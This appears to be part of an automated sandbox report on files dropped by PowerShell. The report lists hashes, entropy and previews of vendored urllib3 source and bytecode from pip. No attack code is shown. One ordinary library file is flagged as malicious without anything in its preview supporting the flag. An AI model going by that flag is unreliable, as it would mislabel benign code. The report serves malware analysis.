                                                                                                                                                                                                                              Preview:# Copyright (c) 2010-2020 Benjamin Peterson.#.# Permission is hereby granted, free of charge, to any person obtaining a copy.# of this software and associated documentation files (the "Software"), to deal.# in the Software without restriction, including without limitation the rights.# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.# copies of the Software, and to permit persons to whom the Software is.# furnished to do so, subject to the following conditions:.#.# The above copyright notice and this permission notice shall be included in all.# copies or substantial portions of the Software..#.# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISI
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):19752
                                                                                                                                                                                                                              Entropy (8bit):4.579321507418698
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:px0JL44vDAD8d76mgTImAmTLmDgDZxp4Butv:pSLPAD8d+FTIpSiKxpAutv
                                                                                                                                                                                                                              MD5:F9688A78D5B0B73FB747C4E8C1ACB378
                                                                                                                                                                                                                              SHA1:E557B1D9779678661DA3B42B349CA0BAFC229B97
                                                                                                                                                                                                                              SHA-256:D22F1C260AEABA9CDAEBB2013D9FEEF635EF9D2C6BE54065544894A9D90FB582
                                                                                                                                                                                                                              SHA-512:8990DC276755E5020E38E2FE272F48A4CB5A82E6A91FEA7E1A1C5FB9A9793F469E1AB3AF966D9E35A87C99043E2C1DB97632534171A7811BDC8F1C09C43B68CA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from __future__ import absolute_import..import collections.import functools.import logging..from ._collections import RecentlyUsedContainer.from .connectionpool import HTTPConnectionPool, HTTPSConnectionPool, port_by_scheme.from .exceptions import (. LocationValueError,. MaxRetryError,. ProxySchemeUnknown,. ProxySchemeUnsupported,. URLSchemeUnknown,.).from .packages import six.from .packages.six.moves.urllib.parse import urljoin.from .request import RequestMethods.from .util.proxy import connection_requires_http_tunnel.from .util.retry import Retry.from .util.url import parse_url..__all__ = ["PoolManager", "ProxyManager", "proxy_from_url"]...log = logging.getLogger(__name__)..SSL_KEYWORDS = (. "key_file",. "cert_file",. "cert_reqs",. "ca_certs",. "ssl_version",. "ca_cert_dir",. "ssl_context",. "key_password",. "server_hostname",.)..# All known keyword arguments that could be provided to the pool manager, its.# pools, or the underlying connectio
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6691
                                                                                                                                                                                                                              Entropy (8bit):4.4509741448995035
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:nLJ2cO6oSxdCyJrs0o9JhTEDfmg3zkK7h3dSnPXW4Xdbnr6athuhI:nL4R6oSXCydo9jymgwKtABZrAhI
                                                                                                                                                                                                                              MD5:ADE432A79C6DDAB6CEC8A19CEB7726F0
                                                                                                                                                                                                                              SHA1:157989366F7BE9B626B40ED7BCB639CADC8D31AE
                                                                                                                                                                                                                              SHA-256:61358536BED023087B1355BD75D7BD2CCEFBBF65564C9E55EFC5EE4D3C3B0F50
                                                                                                                                                                                                                              SHA-512:62C873B1F6A3041B62F97FC0DCBC8AFA94F7E1786ED6C976BE8A160542DDFD76DDDB993A3C21285590D2CC469ED12C3FFDD34437E8B4B088E208C50C17560F5B
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from __future__ import absolute_import..import sys..from .filepost import encode_multipart_formdata.from .packages import six.from .packages.six.moves.urllib.parse import urlencode..__all__ = ["RequestMethods"]...class RequestMethods(object):. """. Convenience mixin for classes who implement a :meth:`urlopen` method, such. as :class:`urllib3.HTTPConnectionPool` and. :class:`urllib3.PoolManager`... Provides behavior for making common types of HTTP request methods and. decides which type of request field encoding to use... Specifically,.. :meth:`.request_encode_url` is for sending requests whose fields are. encoded in the URL (such as GET, HEAD, DELETE)... :meth:`.request_encode_body` is for sending requests whose fields are. encoded in the *body* of the request using multipart or www-form-urlencoded. (such as for POST, PUT, PATCH)... :meth:`.request` is for making any kind of request, it will look up the. appropriate encoding format and use one
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):30641
                                                                                                                                                                                                                              Entropy (8bit):4.264496101925058
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:UbYJr/YVfkk796iiO107J0Q1e+rnS6q0Mq6sQv7bza7igXgPJ:U6Wkk796iXMuQDOR
                                                                                                                                                                                                                              MD5:D15DAB20E01038CB65497C6699B7AA5D
                                                                                                                                                                                                                              SHA1:B29CB7DE80C225172052A0272684FB2C1DE4DBBF
                                                                                                                                                                                                                              SHA-256:7E60C9005906EF5B854E7FAC5524E1D88C345A6717418AA46D18E286FC018D4F
                                                                                                                                                                                                                              SHA-512:C41D4D75359CBD31E69950E1C136EEE6A57095F81A9F674481FCA309301E4A9726BFB9E37961E5BF873D4E8E7862C5C39A9C0DB4F29D129991C20B036923B0B7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from __future__ import absolute_import..import io.import logging.import sys.import warnings.import zlib.from contextlib import contextmanager.from socket import error as SocketError.from socket import timeout as SocketTimeout..brotli = None..from . import util.from ._collections import HTTPHeaderDict.from .connection import BaseSSLError, HTTPException.from .exceptions import (. BodyNotHttplibCompatible,. DecodeError,. HTTPError,. IncompleteRead,. InvalidChunkLength,. InvalidHeader,. ProtocolError,. ReadTimeoutError,. ResponseNotChunked,. SSLError,.).from .packages import six.from .util.response import is_fp_closed, is_response_to_head..log = logging.getLogger(__name__)...class DeflateDecoder(object):. def __init__(self):. self._first_try = True. self._data = b"". self._obj = zlib.decompressobj().. def __getattr__(self, name):. return getattr(self._obj, name).. def decompress(self, data):. if not data:.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1155
                                                                                                                                                                                                                              Entropy (8bit):4.83746578234033
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:1R23fEVkSyG/TfgZ2G1lVZjY/ukxvt5U12MydsFtrB5cNuQOt4TJAAJxj:P+8ynGs1JjY/ukdX32FtrB5cNyKT6sj
                                                                                                                                                                                                                              MD5:F951FB1888473EE32752499CE9B841A5
                                                                                                                                                                                                                              SHA1:896463BCD6481C029DE1EF982B1F532942FA6B02
                                                                                                                                                                                                                              SHA-256:2449929A6AAA2F26B0F0FE75814226661F06C20F62D7349EF83A2A022B67DA77
                                                                                                                                                                                                                              SHA-512:FBB614667E169337204758BCF053EB65E55560BBB9A70CD749CF90F59059DB20C4419C999C1086754DF9D5C2306F9562262C689A8F49EC869309DABC5B6E547B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from __future__ import absolute_import..# For backwards compatibility, provide imports that used to be here..from .connection import is_connection_dropped.from .request import SKIP_HEADER, SKIPPABLE_HEADERS, make_headers.from .response import is_fp_closed.from .retry import Retry.from .ssl_ import (. ALPN_PROTOCOLS,. HAS_SNI,. IS_PYOPENSSL,. IS_SECURETRANSPORT,. PROTOCOL_TLS,. SSLContext,. assert_fingerprint,. resolve_cert_reqs,. resolve_ssl_version,. ssl_wrap_socket,.).from .timeout import Timeout, current_time.from .url import Url, get_host, parse_url, split_first.from .wait import wait_for_read, wait_for_write..__all__ = (. "HAS_SNI",. "IS_PYOPENSSL",. "IS_SECURETRANSPORT",. "SSLContext",. "PROTOCOL_TLS",. "ALPN_PROTOCOLS",. "Retry",. "Timeout",. "Url",. "assert_fingerprint",. "current_time",. "is_connection_dropped",. "is_fp_closed",. "get_host",. "parse_url",. "make_headers",. "resolve_cert_reqs",.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1130
                                                                                                                                                                                                                              Entropy (8bit):5.465817655745337
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:wgUVetDtDuGty+tIsko8yidUmzpr7kDDKBmXIKNnYHIp+:JtD0+m5o8yidU67UDmQ9UIp+
                                                                                                                                                                                                                              MD5:AF2C2453ADAF22336F8493944792A29D
                                                                                                                                                                                                                              SHA1:29EAB723C0441B2E7EEB53CAF32E33A4B331B6C2
                                                                                                                                                                                                                              SHA-256:A138964EC1DC76C3D216CFE05BA1D5B846495F4BBBD4723939A0D4ABCC995B38
                                                                                                                                                                                                                              SHA-512:86E14ABFB12D0472896D713204E2C50E08CED9108087B07EA63CC22A56E9FF9D19AD59F272680CB037B8F79511D9456DB648D239CB3E42768FB47C7C779426C4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf...............................d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m Z m!Z!..d.Z"y.)......)...absolute_import.....)...is_connection_dropped)...SKIP_HEADER..SKIPPABLE_HEADERS..make_headers)...is_fp_closed)...Retry)...ALPN_PROTOCOLS..HAS_SNI..IS_PYOPENSSL..IS_SECURETRANSPORT..PROTOCOL_TLS..SSLContext..assert_fingerprint..resolve_cert_reqs..resolve_ssl_version..ssl_wrap_socket)...Timeout..current_time)...Url..get_host..parse_url..split_first)...wait_for_read..wait_for_write).r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....N)#..__future__r......connectionr......requestr....r....r......responser......retryr......ssl_r....r....r....r....r....r....r....r....r....r......timeoutr....r......urlr....r....r....r......waitr....r......__all__........RC:\Users\xbov\Desktop\pyops\Lib\site-packa
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4740
                                                                                                                                                                                                                              Entropy (8bit):5.497972373331831
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:f4yu3bSQ5EJc367wwStdv2r58H5o9jfuK7pfRuu:XuLSQ+CKeVW5xLL75Ruu
                                                                                                                                                                                                                              MD5:8A5C0207904DBF61830F5C36E1A26B9F
                                                                                                                                                                                                                              SHA1:6ACF8AB2C234CA9E9533F948E9131CED5814BF8D
                                                                                                                                                                                                                              SHA-256:4F70A12F46AE5F4E8B29E64F24A1DC9F89573F4215B44BC85DE34EEE90C5E2E2
                                                                                                                                                                                                                              SHA-512:6F07EEF71D3383F9B1EA142ED4E3DB19FCEE4AD1F9FF62E20D7E0A35A16F6A6F889B3C7E9FFB2B74DEB849875D6D79EF86165D94A83644B84B18949869A6B910
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf%..............................d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d...Z.e.j...................d.d.f.d...Z.d...Z.d...Z.d...Z...e.d.........Z.y.)......)...absolute_importN.....)..._appengine_environ)...LocationParseError)...six.....)...NoWayToWaitForSocketError..wait_for_readc.....................f.....t.........|.d.d.........}.|.d.u.r.y.|...y...t.........|.d...........S.#.t.........$.r...Y.y.w.x.Y.w.).a$.... Returns True if the connection is dropped and should be closed... :param conn:. :class:`http.client.HTTPConnection` object... Note: For platforms like AppEngine, this will always return ``False`` to. let the platform handle connection recycling transparently for us.. ..sockFTg........)...timeout)...getattrr....r....)...connr....s.... .TC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/urllib3/util/connection.py..is_connection_droppedr........sH...........4......'.D....u.}.......|............T.3../../...
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1536
                                                                                                                                                                                                                              Entropy (8bit):5.426308821888846
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8QRQZWXiIQXvAFnT8ade8uF13KNn/bjJgGKXIzV2tTskl5ePWraOmntGvhHn:8Q2ZxI38a48uFK/bjUIpo5eeuVtmBn
                                                                                                                                                                                                                              MD5:FB3ECBAE0879F67839829EDAC8ED5535
                                                                                                                                                                                                                              SHA1:BF4723570CD37340EE5602F2F7CD77879C56C52F
                                                                                                                                                                                                                              SHA-256:7C2CB845F754AE5DDA40779AE192192757544EB86F6E2C854E8050E07D647042
                                                                                                                                                                                                                              SHA-512:C5BE6C51695283A92E3B65DC082ECA1AA8972978E6BFB96324BFAA4A22C65F69C14B072867602244289739CC2E6849C29D8D60D96174F06B0BA83DBD05DDF8AE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.VfE.........................,.....d.d.l.m.Z.m.Z.m.Z.....d.d...Z...d.d...Z.y.)......)...create_urllib3_context..resolve_cert_reqs..resolve_ssl_versionNc.....................R.....|...y.|.d.k(..r.y.|.j...................d.k(..r.|.r.|.j...................r.y.y.).a?.... Returns True if the connection requires an HTTP CONNECT through the proxy... :param URL proxy_url:. URL of the proxy.. :param ProxyConfig proxy_config:. Proxy configuration from poolmanager.py. :param str destination_scheme:. The scheme of the destination. (i.e https, http, etc). F..http..httpsT)...scheme..use_forwarding_for_https)...proxy_url..proxy_config..destination_schemes.... .OC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/urllib3/util/proxy.py..connection_requires_http_tunnelr........s>......................V..#...............G..#........1..1.............c..........................t.........t.........|.........t.........|...................}.|.s |.s.|.s.t..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1336
                                                                                                                                                                                                                              Entropy (8bit):4.643892525059148
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:se1xahmW3KNn1GL8/vMCTCwufmCV/W4CGF/OFkJ4IaE2m9cU:pWuicEC6LWoNQUcU
                                                                                                                                                                                                                              MD5:C8D72A8EFB34EEAAB8544F88AE241A73
                                                                                                                                                                                                                              SHA1:9E0A61F577E5481113630B923FF0BE161EDACB16
                                                                                                                                                                                                                              SHA-256:71CD033C7AFCA2156FF59C32EF7FA5061B248082FDA86A111ABB675201262150
                                                                                                                                                                                                                              SHA-512:DE8AA0463B8361DABE7F506AC284930FC0C695AA5496AF6705724EAA0CF10F174B851D88577AC55CA0D8BDFC7D03C291DC56B354AF60B1EC3EA423943D81DB25
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................n.....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j...................r.d.d.l.Z...G.d...d.e.j...........................Z.y.)......N.....)...six....queuec.....................(.....e.Z.d.Z.d...Z.e.f.d...Z.d...Z.d...Z.y.)...LifoQueuec.....................6.....t.........j...........................|._.........y...N)...collections..dequer....)...self.._s.... .OC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/urllib3/util/queue.py.._initz.LifoQueue._init....s........ ..&..&..(.........c.....................&.......|.|.j...........................S.r....r....).r......lens.... r......_qsizez.LifoQueue._qsize....s..........4.:.:.....r....c.....................:.....|.j...................j...................|...........y.r....).r......append).r......items.... r......_putz.LifoQueue._put....s....................$...r....c.....................6.....|.j...................j...........................S.r....).r......pop).r....s.... r......_getz.LifoQueue._ge
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4167
                                                                                                                                                                                                                              Entropy (8bit):5.657809594191626
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:q+Gj9OQa0ivYufSYzEsL1GgpDKG3xobUdno1PSYPKi6d1CxIeoG17oMkL:q+e9OQ87fSa1TpDKUOUAS8K/Itw
                                                                                                                                                                                                                              MD5:28891AE081E169790F94F44B0D482993
                                                                                                                                                                                                                              SHA1:E539D9B1308026754C6C923884B6ECC4CE8E70CB
                                                                                                                                                                                                                              SHA-256:CCC30C7201249E97A7929161405DE32AC55D72EC06D0A04F783C5AA00329DD54
                                                                                                                                                                                                                              SHA-512:D158494C6136324440DCD9114290E37CB4B64F334151029CDAE15E54D9C041995FB2E26196DD75FF2177FD126015B4BC4C07F4124EAEB35200D84DC14073A0B8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf...............................d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.Z...e.g.d...........Z.d.Z...e.........Z.............d.d...Z.d...Z.d...Z.y.)......)...absolute_import)...b64encode.....)...UnrewindableBodyError)...b..integer_typesz.@@@SKIP_HEADER@@@)...accept-encoding..host..user-agentz.gzip,deflateNc.....................`.....i.}.|.r>t.........|.t.................r.n(t.........|.t.................r.d.j...................|.........}.n.t.........}.|.|.d.<...|.r.|.|.d.<...|.r.d.|.d.<...|.r)d.t.........t.........|.................j...................d.........z...|.d.<...|.r)d.t.........t.........|.................j...................d.........z...|.d.<...|.r.d.|.d.<...|.S.).a..... Shortcuts for generating request headers... :param keep_alive:. If ``True``, adds 'connection: keep-alive' header... :param accept_encoding:. Can be a boolean, list, or string.. ``True`` translates to 'gzip,deflate'.. List will get joined by co
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2973
                                                                                                                                                                                                                              Entropy (8bit):5.533748700971562
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:Lym/Fb16oC0247gkLqr94dNmYGTAsvE6nnVBG1Pzbc:16oWJrWgcsvBnM8
                                                                                                                                                                                                                              MD5:71571ACE1D8E13373951C9964D6F2BF8
                                                                                                                                                                                                                              SHA1:864EEBF35B15CFFD4F5CE8ECE044CE4E324EA5A9
                                                                                                                                                                                                                              SHA-256:428EDC1CC382043D50B17C986E3163754B95875724F1FF48A8C64478FDA675B1
                                                                                                                                                                                                                              SHA-512:4A996AA78EAB0E8031025883260C5738F0DEDC0290C3093FB98D034603A3D5C5CBDE2339DBD4FDD38AA375712BECE21A6F791C88DC1AE4200015AF995C0F04AD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................J.....d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d...Z.d...Z.d...Z.y.)......)...absolute_import)..!MultipartInvariantViolationDefect..StartBoundaryNotFoundDefect.....)...HeaderParsingError)...http_clientc.............................|.j...........................S.#.t.........$.r...Y.n.w.x.Y.w...|.j...................S.#.t.........$.r...Y.n.w.x.Y.w...|.j...................d.u.S.#.t.........$.r...Y.t.........d...........w.x.Y.w.).zt. Checks whether a given file-like object is closed... :param obj:. The file-like object to check.. Nz)Unable to determine whether fp is closed.)...isclosed..AttributeError..closed..fp..ValueError)...objs.... .RC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/urllib3/util/response.py..is_fp_closedr........s{................|.|.~..............................z.z................................v.v...~....................@..A..A......s).....................:...:...A.....A"..!.A".c...........
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):21681
                                                                                                                                                                                                                              Entropy (8bit):5.412281421839754
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:xlo5mUKuD+YIlzXQ4c8pY/ayXS511dapctDfy8N:7o5mU7DIlDQ4vYj8fdESD5N
                                                                                                                                                                                                                              MD5:9FDD19E8D8225AD0EF1F5237EC3E9F18
                                                                                                                                                                                                                              SHA1:ACB1650BE9D4DFF99C4F965CC919408EA2DFFB82
                                                                                                                                                                                                                              SHA-256:B74AF3CE4B9BCEF227EF60E450C4590D2BE19CEA1241681460FE927E159C3FCF
                                                                                                                                                                                                                              SHA-512:11858C3FD51103486FA939082C590D6B3110C2FF1D6B770C49D63D3BE72525A51C5DDC7E76CEB9B7CF00682C7E39FFC5DFFEAF81FADB7233C719D4BD515588BE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf.U........................8.....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.....e.j*..................e.........Z...e.d.g.d...........Z...e.........Z...G.d...d.e.........Z...e.j:..................e...........G.d...d.e.................Z...e.d.........e._.........y.)......)...absolute_importN)...namedtuple)...takewhile.....)...ConnectTimeoutError..InvalidHeader..MaxRetryError..ProtocolError..ProxyError..ReadTimeoutError..ResponseError)...six..RequestHistory)...method..url..error..status..redirect_locationc..........................e.Z.d.Z.e.d...........Z.e.j...................d...........Z.e.d...........Z.e.j...................d...........Z.e.d...........Z.e.j...................d...........Z.y.)..._RetryMetac.....................N.....t.........j...................d.t...................|.j...................S...Nz}Using 'Retry.DEFAULT_METHOD_WHITELIST' is deprecated and will be removed in v2.0. Use
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):15087
                                                                                                                                                                                                                              Entropy (8bit):5.704133725467431
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:B3jGaLH0HHKvt1Aoi842/Qtk1x1vu2dB8fC32qSydOyKcWvaZiO:jiUQMvzfYoOyKci07
                                                                                                                                                                                                                              MD5:D756EADBAA988A45AF5DF011426FB31F
                                                                                                                                                                                                                              SHA1:C8728C7FC906811D432D94CBAF67A4EB29F89512
                                                                                                                                                                                                                              SHA-256:7296F4940923EB5C2739D2E864B2EDE73E945E3D3F34854BFB7F95F8892C1A2E
                                                                                                                                                                                                                              SHA-512:7330654A8B97955C010BE03BA98CE16AA984D1785387A5146772041A1514B213EC7AC9FEC8B0DF45E05F80670C2C68538BB788A161122B1436ABC96FE60CB795
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf.C..............................d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.d.g.Z.e.e.e.d...Z.d...Z...e.e.d.e.........Z ..d.d.l!Z!d.d.l!m"Z"m#Z#....d.d.l!m.Z.....d.d.l%m.Z.....d.d.l!m&Z&..e&Z'..d.d.l!m(Z(....d.d.l!m)Z)m*Z*m+Z+....d.d.l!m,Z,..d.j[..................g.d...........Z...d.d.l!m.Z...d...Z0d ..Z1d!..Z2..d'd"..Z3........................d(d#..Z4d$..Z5d%..Z6d)d&..Z7y.#.e$$.r...Y..zw.x.Y.w.#.e$$.r...Y..~w.x.Y.w.#.e$$.r...Y...w.x.Y.w.#.e$$.r.....d.d.l!m'Z&..e&Z'n.#.e$$.r...d.x.Z'Z&Y.n.w.x.Y.w.Y...w.x.Y.w.#.e$$.r...e&Z(Y...w.x.Y.w.#.e$$.r...d.\...Z*Z+d.Z)Y...w.x.Y.w.#.e$$.r...d.Z,Y...w.x.Y.w.#.e$$.r.....G.d...d.e/........Z.Y...w.x.Y.w.)*.....)...absolute_importN)...hexlify..unhexlify)...md5..sha1..sha256.....)...InsecurePlatformWarning..ProxySchemeUnsupported..SNIMissingWarning..SSLError)...six.....)...BRACELESS_IPV6_ADDRZ_RE..IPV4_REFz.http/1.1).. ....(....@...c..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5055
                                                                                                                                                                                                                              Entropy (8bit):5.4844670118327805
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:0Ae1RWtVv5LtMIxP0zfUb8XGH02iQeUfy2ScGC:0dc5p0zfUwWHYT2ScGC
                                                                                                                                                                                                                              MD5:171DC17693A8F4C55BE3691117E44556
                                                                                                                                                                                                                              SHA1:3353B3CAC0A95733126225862F84739BF78B7C8D
                                                                                                                                                                                                                              SHA-256:9A25B867759DE9F0A37D94DCBA8D47E429F708B10D828ED273A13B7C4AB63C38
                                                                                                                                                                                                                              SHA-512:24D1C39B48126D2F6D92BB6A02CD1BD36048AA29308BA365EDC3D5B222F856D0CB21C51B0F449A0CBB009C836C40314DA82B971BDB2D8CED3FD0972E0C424AEC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf~.........................p.....d.Z.d.d.l.Z.d.d.l.Z...d.d.l.Z.d.Z...G.d...d.e.........Z.d.d...Z.d...Z.d...Z.d...Z.y.#.e.$.r...d.Z.Y..$w.x.Y.w.).zJThe match_hostname() function from Python 3.3.3, essential when using SSL......Nz.3.5.0.1c...........................e.Z.d.Z.y.)...CertificateErrorN)...__name__..__module__..__qualname__........\C:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/urllib3/util/ssl_match_hostname.pyr....r........s.........r....r....c...........................g.}.|.s.y.|.j...................d.........}.|.d.....}.|.d.d...}.|.j...................d.........}.|.|.kD..r.t.........d.t.........|.........z.............|.s!|.j...........................|.j...........................k(..S.|.d.k(..r.|.j...................d...........n{|.j...................d.........s.|.j...................d.........r%|.j...................t.........j...................|...................n4|.j...................t.........j...................|.........j..................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10756
                                                                                                                                                                                                                              Entropy (8bit):5.140340949664855
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:OGicuqXMiaP7KxNLx+GHdrGVEnuukgybPK/5tuQf:5ilq8P7Qx+GHdIOBtuQf
                                                                                                                                                                                                                              MD5:30676528656F39935A078A70EACC0BB4
                                                                                                                                                                                                                              SHA1:C1F9AAD9251DF5F30588C5DBF1A4ECD9E5F2F935
                                                                                                                                                                                                                              SHA-256:A15BF7A1CC2066E79F74CB37C3E0C71121A0A5C7DF0D86B7612651977CFE614A
                                                                                                                                                                                                                              SHA-512:6CA73733FBF7434785256AB84E9785E248130F671171775E826046AC8BA6B1B67A6A8B10CA203E6DECEC4CAC4DD124C4B2C3A8D817CC972129842AE271E71727
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................L.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z...G.d...d.........Z.y.)......N.....)...ProxySchemeUnsupported)...sixi.@..c...........................e.Z.d.Z.d.Z.e.d...........Z...d.d...Z.d...Z.d...Z.d...Z.d.d...Z.d.d...Z.d.d...Z.d d...Z.d d...Z...d!d...Z.d...Z.d...Z.d"d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d#d...Z.d...Z.y.)$..SSLTransportaL.... The SSLTransport wraps an existing socket and establishes an SSL connection... Contrary to Python's implementation of SSLSocket, it allows you to chain. multiple TLS connections together. It's particularly useful if you need to. implement TLS within TLS... The class supports most of the socket API operations.. c.....................h.....t.........|.d.........s&t.........j...................r.t.........d...........t.........d...........y.).z.. Raises a ProxySchemeUnsupported if the provided ssl_context can't be used. for TLS in TLS... The
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11123
                                                                                                                                                                                                                              Entropy (8bit):5.203848738031592
                                                                                                                                                                                                                              Encrypted:false
